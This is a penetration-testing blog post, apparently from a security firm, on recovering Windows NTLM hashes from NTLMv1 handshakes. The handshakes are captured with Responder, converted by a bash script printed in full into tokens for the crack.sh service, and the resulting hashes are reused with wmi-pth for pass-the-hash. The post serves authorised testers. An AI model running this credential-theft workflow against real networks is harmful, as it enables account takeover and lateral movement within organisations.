Cracking NTLMv1 Handshakes with Crack.sh

Read on if you’d like to learn how to crack NTLMv1 handshakes with the crack.sh service to obtain the NTLM hash. Publicized since 2013, this technique is not often leveraged by testers.

Running Responder.py is one of the first tasks performed by most pentesters on internal penetration tests. This tool will spoof Multicast name resolution queries and give the pentester NTLMv1 and NTLMv2 handshakes. Usually the next step is to attempt to crack those handshakes, at a minimum running them against a wordlist such as crackstation.

A NTLMv1 handshake, however, offers another usually ignored cracking option that is guaranteed to give the tester the NTLM hash. The NTLM hash can be used as a password equivalent in a windows environment, unlike the NTLMv1 handshake.

Required Reading

MS-CHAPv2 handshakes can be broken into two rounds of 56 bit DES (and a third round using only 2bytes of the keyspace), which Moxie Demonstrated could be cracked by modern FPGAS (https://www.youtube.com/watch?v=sIidzPntdCM).

NTLMv1 handshakes are essentially MS-CHAPv2 handshakes, making them susceptible to the same weakness (https://markgamache.blogspot.ru/2013/01/ntlm-challenge-response-is-100-broken.html).

How do we exploit this?

Use the crack.sh site to extract the NTLM hash from any MSCHAP or NTLMv1 handshake for $20. You need to convert it to a token, rather than display in Responder directly because the site doesn’t take the challenge/response.

Use the script below to convert the Responder output to a token that will be accepted by crack.sh.

#!/bin/bash

 

if [ $# -lt 1 ]

then

    echo “Usage: ntlm-chapcrack.sh <hash_file> <hash_file2> …”

    exit 1

fi

 

for i in $@; do

for hash in $( cat $i )

do

    user=$(echo $hash | cut -f1 -d:)

    domain=$(echo $hash | cut -f3 -d:)

    lmresp=$(echo $hash | cut -f4 -d:)

    ntresp=$(echo $hash | cut -f5 -d:)

    srvchallenge=$(echo $hash | cut -f6 -d:)

   

    # Secret sauce: https://lists.samba.org/archive/samba-technical/2003-July/030974.html

    if [ ${lmresp:16:32} ==  “00000000000000000000000000000000” ]

    then

       

        clientchallenge=${lmresp:0:16}

        combinedchallenge=$srvchallenge$clientchallenge

 

        srvchallenge=$( echo $combinedchallenge | xxd -r -p| md5sum -b | cut -c1-16)

    fi

 

     echo

     echo “user:$user”

     echo “domain:$domain”

     echo “lmresponse:$lmresp”

     echo “ntresp:$ntresp”

     echo “challenge:$srvchallenge”

   

     chapcrack=$(locate chapcrack.py | head -1)

     if [ -e “$chapcrack” ]

     then

         $chapcrack radius -R $ntresp -C $srvchallenge

     else

        echo “chapcrack.py radius -R $ntresp -C $srvchallenge”

    fi

done

done

Upload this token to crack.sh, give them 20 dollars, and wait for your NTLM hash.

Another Hash?

Yes, NTLM hashes are password equivalents in a Windows environment. To leverage your newly acquired NTLM hash, use a tool like wmi-pth.

 

Speak to a Cyber Security Expert Today

  • This field is for validation purposes and should be left unchanged.

########

All recommendations and case studies presented by Tevora are for information purposes only and not intended to be for the purposes of providing information security advice. Any use of this information for other means is prohibited.